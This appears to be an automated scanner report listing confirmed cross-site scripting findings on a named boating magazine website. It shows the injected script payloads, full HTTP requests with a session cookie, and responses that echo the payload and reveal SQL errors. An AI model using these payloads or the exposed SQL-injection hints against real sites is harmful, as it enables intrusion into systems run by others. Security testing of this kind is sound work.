href="/features"><span>Features</span></a><ul><li class="item89"><a href="/features/destinations"><span>Destinations</span></a></li><li class="item92"><a href="/features/in-depth"><span>In Depth</span></a></li><li class="item91"><a href="/features/type-of-boat"><span>Type of Boat</span></a></li><li class="item90"><a href="/features/profiles"><span>Profiles</span></a></li><li class="item112"><a href="/features/lifestyle"><span>Lifestyle</span></a></li><li class="item162"><a href="/features/technical"><span>Technical</span></a></li><li class="item103"><a href="/features/justyesterday"><span>Just Yesterday</span></a></li></ul></li><li class="item83"><a href="/calendar"><span>Calendar</span></a></li><li class="parent item68"><a href="/subscription-services"><span>Subscription Services</span></a><ul><li class="item113"><a href="http://www.soundingsonline.com/index.php?option=com_chronocontact&amp;chronoformname=CGPage"><span>C.G. Aux.</span></a></li><li class="item163"><a href="http://www.soundingsonline.com/component/chronocontact/?chronoformname=PSPage"><span>U.S. Power Squadron</span></a></li><li class="item69"><a href="http://ezsub.net/isapi/foxisapi.dll/main.sv.run?jt=starr_wc&amp;PUBID=586&amp;SOURCE=INET&amp;RDRID=&amp;SBTYPE=XX&amp;PGTP=A"><span>Missing/Damaged Issue</span></a></li><li class="item73"><a href="http://ezsub.net/isapi/foxisapi.dll/main.sv.run?jt=starr_wc&amp;PUBID=586&amp;SOURCE=INET&amp;RDRID=&amp;SBTYPE=AC&amp;PGTP=A"><span>Address/Email change</span></a></li><li class="item75"><a href="http://ezsub.net/isapi/foxisapi.dll/main.sv.run?jt=starr_wc&amp;PUBID=5U6&amp;SOURCE=INET&amp;RDRID=&amp;SBTYPE=QR&amp;PGTP=A"><span>Renew</span></a></li><li class="item76"><a href="http://ezsub.net/isapi/foxisapi.dll/main.sv.run?jt=starr_wc&amp;PUBID=SND&amp;SOURCE=INET&amp;RDRID=&amp;SBTYPE=QN&amp;PGTP=S"><span>Give a Gift</span></a></li><li class="item77"><a href="http://ezsub.net/isapi/foxisapi.dll/main.sv.run?jt=starr_wc&amp;PUBID=586&amp;SOURCE=INET&amp;RDRID=&amp;SBTYPE=QN&amp;PGTP=S"><span>Subscribe</span></a></li><li class="item202"><a href="/subscription-services/subscribe-to-e-newsletter&q..
- /columns-blogs/under-way/

/columns-blogs/under-way/ CONFIRMED

http://www.soundingsonline.com/columns-blogs/under-way/?'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%..

Parameters

Parameter Type Value
Query Based QUERYSTRING '"--></style></script><script>alert(0x002489)</script>

Request

GET /columns-blogs/under-way/?'"--></style></script><script>netsparker(0x002489)</script> HTTP/1.1
Referer: http://www.soundingsonline.com/columns-blogs/under-way/272112-heroism-shines-through-in-the-worst-conditions
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: www.soundingsonline.com
Cookie: d4dad6935f632ac35975e3001dc7bbe8=nrjskmc2lloa5mrm1f2a65vm63
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Connection: close
Date: Tue, 25 Jan 2011 02:36:56 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET,PHP/5.2.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Tue, 25 Jan 2011 02:36:56 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache


<blockquote><font face=arial size=2 color=ff0000><b>SQL/DB Error --</b> [<font color=000077>You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '"--></style></script><script>netsparker(0x002489)</script>' AND cookie_info=''' at line 1</font>]</font></blockquote><blockquote><font face=arial size=2 color=ff0000><b>SQL/DB Error --</b> [<font color=000077>You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '"--></style></script><script>netsparker(0x002489)</script>','','1')' at line 1</font>]</font></blockquote><!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >

<head>
<base href="http://www.soundingsonline.com/columns-blogs/under-way/" /> <meta http-equiv="content-type" content="text/html; charset=utf-8" /> <meta name="robots" content="index, follow" /> <meta name="keywords" content="Boating articles, boating, boats, marine industry, recreational boating, Boat shows, Yachts, used boats, new boats, used boat sales, new boat sales, boat classifieds, boats for sale, boat broker, boat reviews, boating magazine, boat features,nautical almanac, cruising, sailboat, powerboat,motor yacht, yacht, coast guard, coastguard, Northeast boating, Florida boating, gulf coast boating, Atlantic ocean boating, boating vacation, trawler, boat navigation, boat engines, boat motors, boat electronics, boat gear, boat accessories, boat safety,boating regulations, boating events" /> <meta name="description" content="SoundingsOnline features complete information and entertainment for recreational boaters, including breaking news, boating destinations, boats for sale, new boats and gear, and a complete calendar of boat shows and yachting events. News and feature articles about local people, boats and events are covered in our regional Home Waters section. Thousands of boats for sale; hundreds of waterfront homes." /> <meta name="generator" content="Joomla! 1.5 - Open Source Content Management" /> <title>Underway Column Editorial by Editor Bill Sisson | Soundings Online Column</title> <link href="/columns-blogs/under-way?format=feed&amp;type=rss" rel="alternate" type="application/rss+xml" title="RSS 2.0" /> <link href="/columns-blogs/under-way?format=feed&amp;type=atom" rel="alternate" type="application/atom+xml" title="Atom 1.0" /> <link href="/templates/soundings1/favicon.ico" rel="shortcut icon" type="image/x-icon" /> <link rel="stylesheet" href="http://www.soundingsonline.com/components/com_yvcomment/assets/style001.css" type="text/css" /> <script type="text/javascript" src="/media/system/js/mootools.js"></script> <script type="text/javascript" src="/media/system/js/caption.js"></script>

<meta name="verify-v1" content="l1mWAXJWn7Xr+Frn4D39PflSoePEdoO72UMDIxIVjvk=" />

<link rel="stylesheet" href="/templates/system/css/system.css" type="text/css" />
<link rel="stylesheet" href="/templates/system/css/general.css" type="text/css" />
<link rel="stylesheet" href="/templates/soundings1/css/allstyles.css" type="text/css" />
<link rel="stylesheet" href="/templates/soundings1/css/navbar.css" type="text/css" />
<link rel="stylesheet" href="/templates/soundings1/css/editor.css" type="text/css" />
<link rel="stylesheet" href="/templates/soundings1/css/print.css" type="text/css" media="print" />
<link rel="stylesheet" type="text/css" href="/shadowbox/shadowbox.css" />
<link rel="stylesheet" href="/templates/soundings1/css/fadw.css" type="text/css" media="screen,projection" />
<!--[if lte IE 6]>
<link href="/templates/soundings1/css/ieonly.css" rel="stylesheet" type="text/css" />
<![endif]-->
<!--[if IE 7]>
<link href="/templates/soundings1/css/ie7only.css" rel="stylesheet" type="text/css" />
<![endif]-->

<script type="text/javascript" src="/shadowbox/shadowbox.js"></script>
<script type="text/javascript">
Shadowbox.init({
players: ["img","flv","iframe"]
});
</script>

<script src="/templates/soundings1/javascript/allscripts.js" type="text/javascript"></script>
<script src="/templates/soundings1/javascript/fadw.js" type="text/javascript"></script>
<script src="/templates/soundings1/javascript/suckerfish_menu.js" type="text/javascript"></script>
<script language="JavaScript" type="text/javascript" src="//www.soundingsonline.com/s_code.js"></script>

<!------ OAS SETUP begin ------>
<SCRIPT LANGUAGE=JavaScript>
<!--
//configuration
OAS_url = 'http://oasc05139.247realmedia.com/RealMedia/ads/';
OAS_sitepage = 'www.soundingsonline.com/index.php';
OAS_listpos = 'Top,Middle,Right,Right1,x01,x02,x03,x04';
OAS_query = '';
OAS_target = '_top';
//end of configuration
OAS_version = 10;
OAS_rn = '001234567890'; OAS_rns = '1234567890';
OAS_rn = new String (Math.random()); OAS_rns = OAS_rn.substring (2, 11);
function OAS_NORMAL(pos) {
document.write('<A HREF="' + OAS_url + 'click_nx.ads/' + OAS_sitepage + '/1' + OAS_rns + '@' + OAS_listpos + '!' + pos + '?' + OAS_query + '" TARGET=' + OAS_target + '>');
document.write('<IMG SRC="' + OAS_url + 'adstream_nx.ads/' + OAS_sitepage + '/1' + OAS_rns + '@' + OAS_listpos + '!' + pos + '?' + OAS_query + '" BORDER=0></A>');
}
//-->
</SCRIPT>
<SCRIPT LANGUAGE=JavaScript1.1>
<!--
OAS_version = 11;
if ((navigator.userAgent.indexOf('Mozilla/3') != -1) || (navigator.userAgent.indexOf('Mozilla/4.0 WebTV') != -1))
OAS_version = 10;
if (OAS_version >= 11)
document.write('<SCR' + 'IPT LANGUAGE=JavaScript1.1 SRC="' + OAS_url + 'adstream_mjx.ads/' + OAS_sitepage + '/1' + OAS_rns + '@' + OAS_listpos + '?' + OAS_query + '"><\/SCRIPT>');//-->
</SCRIPT><SCRIPT LANGUAGE=JavaScript>
<!--
document.write('');
function OAS_AD(pos) {
if (OAS_version >= 11)
OAS_RICH(pos);
else
OAS_NORMAL(pos);
} //-->
</SCRIPT>
<!------ OAS SETUP end ------>

</head>


<body class="s_columns_blogs c_under_way m_under_way"><!--
Type of page: category<br />Section: 8, s_columns_blogs<br />Category: 58, c_under_way<br />Menu: 97, m_under_way-->
<!--
The name of this site is Soundings Online<br />
The administrator email is e.cirillo@soundingspub.com<br />
This template is in the soundings1 directory<br />
The URL is http://www.soundingsonline.com/-->

<div id="all">
<div id="header">
<div id="leaderboard">
<!------ OAS AD 'Top' begin ------>
<SCRIPT LANGUAGE=JavaScript>
<!--
OAS_AD('Top');
//-->
</SCRIPT>
<!------ OAS AD 'Top' end ------>
</div>

<div id="search_bar">
<ul class="menu"><li class="item60"><a href="/archives"><span>Archives</span></a></li><li class="item105"><a href="http://www.barkerstores.com/soundings" target="_blank"><span>Buy Soundings Gear</span></a></li><li class="item106"><a href="/advertise"><span>Advertise</span></a></li></ul><!-- Extra Menu -->
<form action="index.php" method="post"> <div class="search"> <input name="searchword" id="mod_search_searchword" maxlength="30" alt="Search" class="inputbox" type="text" size="30" value="Search..." onblur="if(this.value=='') this.value='Search...';" onfocus="if(this.value=='Search...') this.value='';" /><input type="submit" value="Search" class="button" onclick="this.form.searchword.focus();"/> </div> <input type="hidden" name="task" value="search" /> <input type="hidden" name="option" value="com_search" /></form><!-- Search -->
</div> <!-- end search_bar -->

<h1 id="logo"><a href="/index.php"><img src="/templates/soundings1/images/snd_logo.jpg" alt="Soundings" /></a></h1>
<!--<div id="sub_cover"><a href="/"><img src="/templates/soundings1/images/subcovers.jpg" alt="Subscribe or Preview the Current Issue" /></a></div>-->

<div id="sub_cover">
<map name="subCoverMap" id="subCovers">
<area shape="rect" coords="2,130,83,152" href="http://www.soundingsonline.com/subscription-services" alt="Subscribe" />
<area shape="rect" coords="84,122,164,152" href="http://www.soundingsonline.com/subscription-services/preview-current-issue" alt="Preview Current Issue" />
<img name="subCover" src="/templates/soundings1/images/subcovers.jpg" alt="Subscribe or Preview the Current Issue" usemap="#subCoverMap" border="0" />
</map>
</div>

<div id="tabs">
<map name="tabsMap" id="tabsMap">
<area shape="rect" coords="0,0,130,40" href="http://www.soundingsonline.com/index.php?option=com_content&view=category&layout=blog&id=98&Itemid=111" alt="Buy a Boat" onmouseover="rollOn('nav1'); return true;" onmouseout="rollOff(); return true;" />
<area shape="rect" coords="131,0,241,40" href="http://www.soundingssellmyboat.com/" target="_blank" alt="Sell a Boat" onmouseover="rollOn('nav2'); return true;" onmouseout="rollOff(); return true;" />
<area shape="rect" coords="242,0,357,40" href="http://www.soundingsonline.com/component/content/article/237622" alt="Service Directory" onmouseover="rollOn('nav3'); return true;" onmouseout="rollOff(); return true;" />
<area shape="rect" coords="358,0,471,40" href="http://www.soundingsonline.com/Waterfront/default.html" target="_blank" alt="Waterfront Property" onmouseover="rollOn('nav4'); return true;" onmouseout="rollOff(); return true;" />
</map>

<img name="navs" src="//www.soundingsonline.com/templates/soundings1/images/header_tabs.jpg" width="471" height="41" usemap="#tabsMap" border="0" alt="Buy a Boat Online Search, Sell a Boat Classifieds, Boat Locker Marketplace, Waterfront Property" />
</div>

<ul class="menu sf-menu" id="mainnav"><li id="current" class="active item1 active1"><a href="http://www.soundingsonline.com/"><span>Home</span></a></li><li class="parent item53"><a href="/news"><span>News</span></a><ul><li class="item115"><a href="/news/coastwise"><span>Coastwise</span></a></li><li class="item84"><a href="/news/todays-top-stories"><span>Today's Top Stories</span></a></li><li class="item86"><a href="/news/home-waters"><span>Home Waters</span></a></li><li class="item85"><a href="/news/mishaps-a-rescues"><span>Mishaps &amp; Rescues</span></a></li><li class="item88"><a href="/news/sailing"><span>Sailing</span></a></li><li class="item222"><a href="/news/dispatches"><span>Dispatches</span></a></li></ul></li><li class="parent item59"><a href="/boat-shop"><span>Boat Shop</span></a><ul><li class="item79"><a href="/boat-shop/sea-savvy"><span>Sea Savvy</span></a></li><li class="item93"><a href="/boat-shop/know-how"><span>Know-How</span></a></li><li class="item94"><a href="/boat-shop/q-a-a"><span>Q &amp; A</span></a></li><li class="item62"><a href="/boat-shop/new-boats"><span>New Boats</span></a></li><li class="item81"><a href="/boat-shop/on-powerboats"><span>On Powerboats</span></a></li><li class="item95"><a href="/boat-shop/on-sailboats"><span>On Sailboats</span></a></li><li class="item63"><a href="/boat-shop/used-boat-review"><span>Used Boat Review</span></a></li><li class="item64"><a href="/boat-shop/new-gear"><span>New Gear</span></a></li><li class="item152"><a href="/boat-shop/tech-talk"><span>Tech Talk</span></a></li></ul></li><li class="parent item65"><a href="/columns-blogs"><span>Columns/Blogs</span></a><ul><li class="item97"><a href="/columns-blogs/under-way"><span>Under Way</span></a></li><li class="item102"><a href="/columns-blogs/books"><span>Books</span></a></li><li class="item98"><a href="/columns-blogs/bay-tripper"><span>Bay Tripper</span></a></li><li class="item99"><a href="/columns-blogs/new-england-fishing"><span>New England Fishing</span></a></li></ul></li><li class="parent item67"><a href="/features"><span>Features</span></a><ul><li class="item89"><a href="/features/destinations"><span>Destinations</span></a></li><li class="item92"><a href="/features/in-depth"><span>In Depth</span></a></li><li class="item91"><a href="/features/type-of-boat"><span>Type of Boat</span></a></li><li class="item90"><a href="/features/profiles"><span>Profiles</span></a></li><li class="item112"><a href="/features/lifestyle"><span>Lifestyle</span></a></li><li class="item162"><a href="/features/technical"><span>Technical</span></a></li><li class="item103"><a href="/features/justyesterday"><span>Just Yesterday</span></a></li></ul></li><li class="item83"><a href="/calendar"><span>Calendar</span></a></li><li class="parent item68"><a href="/subscription-services"><span>Subscription Services</span></a><ul><li class="item113"><a href="http://www.soundingsonline.com/index.php?option=com_chronocontact&amp;chronoformname=CGPage"><span>C.G. Aux.</span></a></li><li class="item163"><a href="http://www.soundingsonline.com/component/chronocontact/?chronoformname=PSPage"><span>U.S. Power Squadron</span></a></li><li class="item69"><a href="http://ezsub.net/isapi/foxisapi.dll/main.sv.run?jt=starr_wc&amp;PUBID=586&amp;SOURCE=INET&amp;RDRID=&amp;SBTYPE=XX&amp;PGTP=A"><span>Missing/Damaged Issue</span></a></li><li class="item73"><a href="http://ezsub.net/isapi/foxisapi.dll/main.sv.run?jt=starr_wc&amp;PUBID=586&amp;SOURCE=INET&amp;RDRID=&amp;SBTYPE=AC&amp;PGTP=A"><span>Address/Email change</span></a></li><li class="item75"><a href="http://ezsub.net/isapi/foxisapi.dll/main.sv.run?jt=starr_wc&amp;PUBID=5U6&amp;SOURCE=INET&amp;RDRID=&amp;SBTYPE=QR&amp;PGTP=A"><span>Renew</span></a></li><li class="item76"><a href="http://ezsub.net/isapi/foxisapi.dll/main.sv.run?jt=starr_wc&amp;PUBID=SND&amp;SOURCE=INET&amp;RDRID=&amp;SBTYPE=QN&amp;PGTP=S"><span>Give a Gift</span></a></li><li class="item77"><a href="http://ezsub.net/isapi/foxisapi.dll/main.sv.run?jt=starr_wc&amp;PUBID=586&amp;SOURCE=INET&amp;RDRID=&amp;SB..
- /features/

/features/ CONFIRMED

http://www.soundingsonline.com/features/?'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x00247..

Parameters

Parameter Type Value
Query Based QUERYSTRING '"--></style></script><script>alert(0x002475)</script>

Request

GET /features/?'"--></style></script><script>netsparker(0x002475)</script> HTTP/1.1
Referer: http://www.soundingsonline.com/features/destinations
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: www.soundingsonline.com
Cookie: d4dad6935f632ac35975e3001dc7bbe8=nrjskmc2lloa5mrm1f2a65vm63
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Connection: close
Date: Tue, 25 Jan 2011 02:36:56 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET,PHP/5.2.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Tue, 25 Jan 2011 02:36:56 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache


<blockquote><font face=arial size=2 color=ff0000><b>SQL/DB Error --</b> [<font color=000077>You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '"--></style></script><script>netsparker(0x002475)</script>' AND cookie_info=''' at line 1</font>]</font></blockquote><blockquote><font face=arial size=2 color=ff0000><b>SQL/DB Error --</b> [<font color=000077>You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '"--></style></script><script>netsparker(0x002475)</script>','','1')' at line 1</font>]</font></blockquote><!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >

<head>
<base href="http://www.soundingsonline.com/features/" /> <meta http-equiv="content-type" content="text/html; charset=utf-8" /> <meta name="robots" content="index, follow" /> <meta name="keywords" content="Boating articles, boating, boats, marine industry, recreational boating, Boat shows, Yachts, used boats, new boats, used boat sales, new boat sales, boat classifieds, boats for sale, boat broker, boat reviews, boating magazine, boat features,nautical almanac, cruising, sailboat, powerboat,motor yacht, yacht, coast guard, coastguard, Northeast boating, Florida boating, gulf coast boating, Atlantic ocean boating, boating vacation, trawler, boat navigation, boat engines, boat motors, boat electronics, boat gear, boat accessories, boat safety,boating regulations, boating events" /> <meta name="description" content="SoundingsOnline features complete information and entertainment for recreational boaters, including breaking news, boating destinations, boats for sale, new boats and gear, and a complete calendar of boat shows and yachting events. News and feature articles about local people, boats and events are covered in our regional Home Waters section. Thousands of boats for sale; hundreds of waterfront homes." /> <meta name="generator" content="Joomla! 1.5 - Open Source Content Management" /> <title>Boating Stories, Boating Destinations, Boat and People Profiles | Soundings Online</title> <link href="/features?format=feed&amp;type=rss" rel="alternate" type="application/rss+xml" title="RSS 2.0" /> <link href="/features?format=feed&amp;type=atom" rel="alternate" type="application/atom+xml" title="Atom 1.0" /> <link href="/templates/soundings1/favicon.ico" rel="shortcut icon" type="image/x-icon" /> <link rel="stylesheet" href="http://www.soundingsonline.com/modules/mod_news_show_gk3/style/style.php?modid=f_lifestyle&amp;news_content_header_pos=1&amp;news_content_image_pos=1&amp;img_height=0&amp;img_width=300px&amp;news_content_info_pos=1&amp;news_content_readmore_pos=1&amp;news_content_text_pos=1" type="text/css" /> <link rel="stylesheet" href="http://www.soundingsonline.com/modules/mod_news_show_gk3/style/style.php?modid=f_profile&amp;news_content_header_pos=1&amp;news_content_image_pos=1&amp;img_height=0&amp;img_width=300px&amp;news_content_info_pos=1&amp;news_content_readmore_pos=1&amp;news_content_text_pos=1" type="text/css" /> <link rel="stylesheet" href="http://www.soundingsonline.com/modules/mod_news_show_gk3/style/style.php?modid=f_technical&amp;news_content_header_pos=1&amp;news_content_image_pos=1&amp;img_height=0&amp;img_width=300px&amp;news_content_info_pos=1&amp;news_content_readmore_pos=1&amp;news_content_text_pos=1" type="text/css" /> <link rel="stylesheet" href="http://www.soundingsonline.com/modules/mod_news_show_gk3/style/style.php?modid=f_in_depth&amp;news_content_header_pos=1&amp;news_content_image_pos=1&amp;img_height=0&amp;img_width=300px&amp;news_content_info_pos=1&amp;news_content_readmore_pos=1&amp;news_content_text_pos=1" type="text/css" /> <link rel="stylesheet" href="http://www.soundingsonline.com/modules/mod_news_show_gk3/style/style.php?modid=f_destination&amp;news_content_header_pos=1&amp;news_content_image_pos=1&amp;img_height=0&amp;img_width=0&amp;news_content_info_pos=1&amp;news_content_readmore_pos=1&amp;news_content_text_pos=1" type="text/css" /> <script type="text/javascript" src="/media/system/js/mootools.js"></script> <script type="text/javascript" src="/media/system/js/caption.js"></script> <script type="text/javascript" src="http://www.soundingsonline.com/modules/mod_news_show_gk3/scripts/engine_compressed.js"></script>

<meta name="verify-v1" content="l1mWAXJWn7Xr+Frn4D39PflSoePEdoO72UMDIxIVjvk=" />

<link rel="stylesheet" href="/templates/system/css/system.css" type="text/css" />
<link rel="stylesheet" href="/templates/system/css/general.css" type="text/css" />
<link rel="stylesheet" href="/templates/soundings1/css/allstyles.css" type="text/css" />
<link rel="stylesheet" href="/templates/soundings1/css/navbar.css" type="text/css" />
<link rel="stylesheet" href="/templates/soundings1/css/editor.css" type="text/css" />
<link rel="stylesheet" href="/templates/soundings1/css/print.css" type="text/css" media="print" />
<link rel="stylesheet" type="text/css" href="/shadowbox/shadowbox.css" />
<link rel="stylesheet" href="/templates/soundings1/css/fadw.css" type="text/css" media="screen,projection" />
<!--[if lte IE 6]>
<link href="/templates/soundings1/css/ieonly.css" rel="stylesheet" type="text/css" />
<![endif]-->
<!--[if IE 7]>
<link href="/templates/soundings1/css/ie7only.css" rel="stylesheet" type="text/css" />
<![endif]-->

<script type="text/javascript" src="/shadowbox/shadowbox.js"></script>
<script type="text/javascript">
Shadowbox.init({
players: ["img","flv","iframe"]
});
</script>

<script src="/templates/soundings1/javascript/allscripts.js" type="text/javascript"></script>
<script src="/templates/soundings1/javascript/fadw.js" type="text/javascript"></script>
<script src="/templates/soundings1/javascript/suckerfish_menu.js" type="text/javascript"></script>
<script language="JavaScript" type="text/javascript" src="//www.soundingsonline.com/s_code.js"></script>

<!------ OAS SETUP begin ------>
<SCRIPT LANGUAGE=JavaScript>
<!--
//configuration
OAS_url = 'http://oasc05139.247realmedia.com/RealMedia/ads/';
OAS_sitepage = 'www.soundingsonline.com/index.php';
OAS_listpos = 'Top,Middle,Right,Right1,x01,x02,x03,x04';
OAS_query = '';
OAS_target = '_top';
//end of configuration
OAS_version = 10;
OAS_rn = '001234567890'; OAS_rns = '1234567890';
OAS_rn = new String (Math.random()); OAS_rns = OAS_rn.substring (2, 11);
function OAS_NORMAL(pos) {
document.write('<A HREF="' + OAS_url + 'click_nx.ads/' + OAS_sitepage + '/1' + OAS_rns + '@' + OAS_listpos + '!' + pos + '?' + OAS_query + '" TARGET=' + OAS_target + '>');
document.write('<IMG SRC="' + OAS_url + 'adstream_nx.ads/' + OAS_sitepage + '/1' + OAS_rns + '@' + OAS_listpos + '!' + pos + '?' + OAS_query + '" BORDER=0></A>');
}
//-->
</SCRIPT>
<SCRIPT LANGUAGE=JavaScript1.1>
<!--
OAS_version = 11;
if ((navigator.userAgent.indexOf('Mozilla/3') != -1) || (navigator.userAgent.indexOf('Mozilla/4.0 WebTV') != -1))
OAS_version = 10;
if (OAS_version >= 11)
document.write('<SCR' + 'IPT LANGUAGE=JavaScript1.1 SRC="' + OAS_url + 'adstream_mjx.ads/' + OAS_sitepage + '/1' + OAS_rns + '@' + OAS_listpos + '?' + OAS_query + '"><\/SCRIPT>');//-->
</SCRIPT><SCRIPT LANGUAGE=JavaScript>
<!--
document.write('');
function OAS_AD(pos) {
if (OAS_version >= 11)
OAS_RICH(pos);
else
OAS_NORMAL(pos);
} //-->
</SCRIPT>
<!------ OAS SETUP end ------>

</head>


<body class="s_home c_home m_features"><!--
Type of page: frontpage<br />Section: , s_home<br />Category: , c_home<br />Menu: 67, m_features-->
<!--
The name of this site is Soundings Online<br />
The administrator email is e.cirillo@soundingspub.com<br />
This template is in the soundings1 directory<br />
The URL is http://www.soundingsonline.com/-->

<div id="all">
<div id="header">
<div id="leaderboard">
<!------ OAS AD 'Top' begin ------>
<SCRIPT LANGUAGE=JavaScript>
<!--
OAS_AD('Top');
//-->
</SCRIPT>
<!------ OAS AD 'Top' end ------>
</div>

<div id="search_bar">
<ul class="menu"><li class="item60"><a href="/archives"><span>Archives</span></a></li><li class="item105"><a href="http://www.barkerstores.com/soundings" target="_blank"><span>Buy Soundings Gear</span></a></li><li class="item106"><a href="/advertise"><span>Advertise</span></a></li></ul><!-- Extra Menu -->
<form action="index.php" method="post"> <div class="search"> <input name="searchword" id="mod_search_searchword" maxlength="30" alt="Search" class="inputbox" type="text" size="30" value="Search..." onblur="if(this.value=='') this.value='Search...';" onfocus="if(this.value=='Search...') this.value='';" /><input type="submit" value="Search" class="button" onclick="this.form.searchword.focus();"/> </div> <input type="hidden" name="task" value="search" /> <input type="hidden" name="option" value="com_search" /></form><!-- Search -->
</div> <!-- end search_bar -->

<h1 id="logo"><a href="/index.php"><img src="/templates/soundings1/images/snd_logo.jpg" alt="Soundings" /></a></h1>
<!--<div id="sub_cover"><a href="/"><img src="/templates/soundings1/images/subcovers.jpg" alt="Subscribe or Preview the Current Issue" /></a></div>-->

<div id="sub_cover">
<map name="subCoverMap" id="subCovers">
<area shape="rect" coords="2,130,83,152" href="http://www.soundingsonline.com/subscription-services" alt="Subscribe" />
<area shape="rect" coords="84,122,164,152" href="http://www.soundingsonline.com/subscription-services/preview-current-issue" alt="Preview Current Issue" />
<img name="subCover" src="/templates/soundings1/images/subcovers.jpg" alt="Subscribe or Preview the Current Issue" usemap="#subCoverMap" border="0" />
</map>
</div>

<div id="tabs">
<map name="tabsMap" id="tabsMap">
<area shape="rect" coords="0,0,130,40" href="http://www.soundingsonline.com/index.php?option=com_content&view=category&layout=blog&id=98&Itemid=111" alt="Buy a Boat" onmouseover="rollOn('nav1'); return true;" onmouseout="rollOff(); return true;" />
<area shape="rect" coords="131,0,241,40" href="http://www.soundingssellmyboat.com/" target="_blank" alt="Sell a Boat" onmouseover="rollOn('nav2'); return true;" onmouseout="rollOff(); return true;" />
<area shape="rect" coords="242,0,357,40" href="http://www.soundingsonline.com/component/content/article/237622" alt="Service Directory" onmouseover="rollOn('nav3'); return true;" onmouseout="rollOff(); return true;" />
<area shape="rect" coords="358,0,471,40" href="http://www.soundingsonline.com/Waterfront/default.html" target="_blank" alt="Waterfront Property" onmouseover="rollOn('nav4'); return true;" onmouseout="rollOff(); return true;" />
</map>

<img name="navs" src="//www.soundingsonline.com/templates/soundings1/images/header_tabs.jpg" width="471" height="41" usemap="#tabsMap" border="0" alt="Buy a Boat Online Search, Sell a Boat Classifieds, Boat Locker Marketplace, Waterfront Property" />
</div>

<ul class="menu sf-menu" id="mainnav"><li id="current" class="active item1 active1"><a href="http://www.soundingsonline.com/"><span>Home</span></a></li><li class="parent item53"><a href="/news"><span>News</span></a><ul><li class="item115"><a href="/news/coastwise"><span>Coastwise</span></a></li><li class="item84"><a href="/news/todays-top-stories"><span>Today's Top Stories</span></a></li><li class="item86"><a href="/news/home-waters"><span>Home Waters</span></a></li><li class="item85"><a href="/news/mishaps-a-rescues"><span>Mishaps &amp; Rescues</span></a></li><li class="item88"><a href="/news/sailing"><span>Sailing</span></a></li><li class="item222"><a href="/news/dispatches"><span>Dispatches</span></a></li></ul></li><li class="parent item59"><a href="/boat-shop"><span>Boat Shop</span></a><ul><li class="item79"><a href="/boat-shop/sea-savvy"><span>Sea Savvy</span></a></li><li class="item93"><a href="/boat-shop/know-how"><span>Know-How</span></a></li><li class="item94"><a href="/boat-shop/q-a-a"><span>Q &amp; A</span></a></li><li class="item62"><a href="/boat-shop/new-boats"><span>New Boats</span></a></li><li class="item81"><a href="/boat-shop/on-powerboats"><span>On Powerboats</span></a></li><li class="item95"><a href="/boat-shop/on-sailboats"><span>On Sailboats</span></a></li><li class="item63"><a href="/boat-shop/used-boat-review"><span>Used Boat Review</span></a></li><li class="item64"><a href="/boat-shop/new-gear"><span>New Gear</span></a></li><li class="item152"><a href="/boat-shop/tech-talk"><span>Tech Talk</span></a></li></ul></li><li class="parent item65"><a href="/columns-blogs"><span>Columns/Blogs</span></a><ul><li class="item97"><a href="/columns-blogs/under-way"><span>Under Way</span></a></li><li class="item102"><a href="/columns-blogs/books"><span>Books</span></a></li><li class="item98"><a href="/columns-blogs/bay-tripper"><span>Bay Tripper</span></a></li><li class="item99"><a href="/columns-blogs/new-england-fishing"><span>New England Fishing</span></a></li></ul></li><li class="parent item67"><a href="/features"><span>Features</span></a><ul><li class="item89"><a href="/features/destinations"><span>Destinations</span></a></li><li class="item92"><a href="/features/in-depth"><span>In Depth</span></a></li><li class="item91"><a href="/features/type-of-boat"><span>Type of Boat</span></a></li><li class="item90"><a href="/features/profiles"><span>Profiles</span></a></li><li class="item112"><a href="/features/lifestyle"><span>Lifestyle</span></a></li><li class="item162"><a href="/features/technical"><span>Technical</span></a></li><li class="item103"><a href="/features/justyesterday"><span>Just Yesterday</span></a></li></ul></li><li class="item83"><a href="/calendar"&..
- /boat-shop/on-powerboats/

/boat-shop/on-powerboats/ CONFIRMED

http://www.soundingsonline.com/boat-shop/on-powerboats/?'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%..

Parameters

Parameter Type Value
Query Based QUERYSTRING '"--></style></script><script>alert(0x002499)</script>

Request

GET /boat-shop/on-powerboats/?'"--></style></script><script>netsparker(0x002499)</script> HTTP/1.1
Referer: http://www.soundingsonline.com/boat-shop/on-powerboats/272522-columbia-the-gem-of-rock-harbor
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: www.soundingsonline.com
